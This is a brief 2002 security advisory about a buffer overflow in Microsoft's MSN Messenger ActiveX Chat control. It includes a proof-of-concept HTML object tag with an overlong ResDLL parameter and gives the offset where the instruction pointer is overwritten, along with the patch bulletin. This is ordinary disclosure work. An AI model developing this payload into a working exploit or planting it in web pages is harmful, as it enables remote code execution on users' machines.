Reported May 8, 2002, by eEye Digital Security.
VERSION AFFECTED
· Microsoft MSN Messenger ActiveX Chat Control
DESCRIPTION
A
buffer overflow condition exists in Microsoft’s MSN Messenger Chat control
that can result in unauthorized code execution. Even if users
haven't installed Messenger, an attacker can call the control from the codebase
tag, which would prompt users to install the control with Microsoft's
credentials, because Microsoft signs the OLE custom control (OCX). eEye’s
advisory
gives a detailed explanation on this vulnerability.
DEMONSTRATION
eEye Digital Security provided the following example as proof-of-concept:
<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"
height="523">
<param name="_cx" value="12039">
<param name="_cy" value="13838">
<param name="BackColor" value="50331647">
<param name="ForeColor" value="43594547">
<param name="RedirectURL" value="">
<param name="ResDLL" value="AAAAAAA\[27,257 bytes is where the EIP starts\]">
</object>
VENDOR RESPONSE
The vendor, Microsoft, has released Security Bulletin MS02-022 to address this vulnerability and recommends that affected users apply the appropriate patch listed in the bulletin.
CREDIT
Discovered
by Drew Copley and eEye Digital Security.